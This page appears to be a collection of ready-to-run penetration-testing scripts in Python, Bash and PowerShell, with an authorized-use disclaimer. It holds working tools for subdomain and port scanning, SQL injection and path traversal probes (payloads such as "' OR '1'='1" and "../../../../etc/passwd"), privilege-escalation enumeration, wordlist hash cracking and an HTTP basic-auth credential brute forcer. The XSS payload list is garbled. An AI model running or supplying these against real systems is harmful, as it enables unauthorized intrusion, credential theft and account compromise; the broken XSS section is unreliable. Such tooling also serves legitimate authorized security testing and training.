🛠️ Security Scripts
Ready-to-use automation scripts for penetration testing, reconnaissance, and security assessments. Copy and run in your testing environment.
⚠️ Usage Policy: These scripts are for authorized security testing only. Ensure you have explicit permission before running any security tools against target systems.
🔍 Reconnaissance Scripts
Subdomain Enumerator
PythonEnumerate subdomains using wordlist and DNS resolution.
import dns.resolver
import socket
def enumerate_subdomains(domain, wordlist):
found = []
with open(wordlist) as f:
for line in f:
subdomain = line.strip() + '.' + domain
try:
ip = socket.gethostbyname(subdomain)
print(f"[+] {subdomain} -> {ip}")
found.append(subdomain)
except:
pass
return found
if __name__ == '__main__':
enumerate_subdomains('example.com', 'subdomains.txt')
pip install dnspythonHTTP Directory Scanner
PythonScan web servers for common directories and files.
import requests
def scan_directories(url, wordlist):
found = []
with open(wordlist) as f:
for path in f:
path = path.strip()
target = f"{url}/{path}"
try:
r = requests.get(target, timeout=5)
if r.status_code == 200:
print(f"[+] {target} ({r.status_code})")
found.append(target)
except:
pass
return found
if __name__ == '__main__':
scan_directories('http://target.com', 'dirs.txt')
pip install requestsPort Scanner
PythonFast TCP port scanner with concurrent connections.
import socket
from concurrent.futures import ThreadPoolExecutor
def scan_port(host, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((host, port))
if result == 0:
print(f"[+] Port {port} is open")
sock.close()
return port
except:
pass
def scan_ports(host, ports):
with ThreadPoolExecutor(max_workers=100) as executor:
executor.map(lambda p: scan_port(host, p), ports)
if __name__ == '__main__':
scan_ports('192.168.1.1', range(1, 1001))
🌐 Web Exploitation Scripts
SQL Injection Scanner
PythonBasic SQL injection vulnerability scanner for GET parameters.
import requests
payloads = ["'", "' OR '1'='1", '" OR "1"="1', "1' AND 1=1--"]
def test_sqli(url, param):
for payload in payloads:
target = f"{url}?{param}={payload}"
try:
r = requests.get(target, timeout=10)
if 'error' in r.text.lower() or 'sql' in r.text.lower():
print(f"[!] Potential SQLi: {target}")
return True
except:
pass
return False
if __name__ == '__main__':
test_sqli('http://target.com/page.php', 'id')
XSS Payload Tester
PythonTest web forms for reflected XSS vulnerabilities.
import requests
xss_payloads = [
"",
"
",
"
Path Traversal Tester
PythonTest parameters for path traversal vulnerabilities.
import requests
paths = [
"../../../../etc/passwd",
"..\\..\\..\\..\\windows\\win.ini",
"....//....//....//etc/passwd"
]
def test_traversal(url, param):
for path in paths:
target = f"{url}?{param}={path}"
try:
r = requests.get(target, timeout=10)
if "root:" in r.text or "[extensions]" in r.text:
print(f"[!] Path Traversal: {target}")
return True
except:
pass
return False
if __name__ == '__main__':
test_traversal('http://target.com/download', 'file')
🔓 Privilege Escalation Scripts
Linux Enum Script
BashComprehensive Linux enumeration for privilege escalation.
#!/bin/bash echo "[*] Linux Privilege Escalation Checker" echo "[*] Current User:" whoami id echo "[*] SUID Binaries:" find / -perm -4000 -type f 2>/dev/null echo "[*] Sudo Permissions:" sudo -l 2>/dev/null echo "[*] Writable /etc/passwd:" ls -la /etc/passwd | grep -E 'w.*r.*r' echo "[*] Cron Jobs:" ls -la /etc/cron* 2>/dev/null echo "[*] Network Connections:" netstat -tulpn 2>/dev/null echo "[*] Running Services:" ps aux | grep -E 'root|cron|ssh|apache' echo "[*] NFS Shares:" cat /etc/exports 2>/dev/null
Windows Enum Script
PowerShellWindows privilege escalation enumeration script.
# Windows Privilege Escalation Checker
Write-Host "[*] Windows Privilege Escalation Checker" -ForegroundColor Green
Write-Host "`n[*] Current User:" -ForegroundColor Cyan
whoami /all
Write-Host "`n[*] User Privileges:" -ForegroundColor Cyan
whoami /priv
Write-Host "`n[*] System Info:" -ForegroundColor Cyan
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Write-Host "`n[*] Running Services:" -ForegroundColor Cyan
Get-Service | Where-Object {$_.Status -eq "Running"}
Write-Host "`n[*] Scheduled Tasks:" -ForegroundColor Cyan
schtasks /query /fo LIST 2>$null
Write-Host "`n[*] AlwaysInstallElevated:" -ForegroundColor Cyan
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
🔑 Password Attack Scripts
Hash Cracker Template
PythonBasic hash cracking script using wordlist.
import hashlib
def crack_hash(target_hash, wordlist, algorithm='sha256'):
with open(wordlist) as f:
for word in f:
word = word.strip()
if algorithm == 'md5':
hashed = hashlib.md5(word.encode()).hexdigest()
elif algorithm == 'sha1':
hashed = hashlib.sha1(word.encode()).hexdigest()
else:
hashed = hashlib.sha256(word.encode()).hexdigest()
if hashed.lower() == target_hash.lower():
print(f"[+] Found: {word}")
return word
return None
if __name__ == '__main__':
result = crack_hash('5e884898da28047...', 'rockyou.txt', 'sha256')
print(f"Cracked: {result}")
Credential Brute Forcer
PythonBasic HTTP basic auth brute forcer.
import requests
from itertools import product
def brute_force(url, users, passwords):
for user, pwd in product(users, passwords):
try:
r = requests.get(url, auth=(user, pwd), timeout=5)
if r.status_code == 200:
print(f"[+] Valid: {user}:{pwd}")
return (user, pwd)
else:
print(f"[-] Failed: {user}:{pwd}")
except:
pass
return None
if __name__ == '__main__':
with open('users.txt') as f:
users = [u.strip() for u in f]
with open('passwords.txt') as f:
passwords = [p.strip() for p in f]
brute_force('http://target.com/admin', users, passwords)
Contributing Scripts: Have a useful security script? Submit it via the contact form and it may be added to this collection.
Back to Home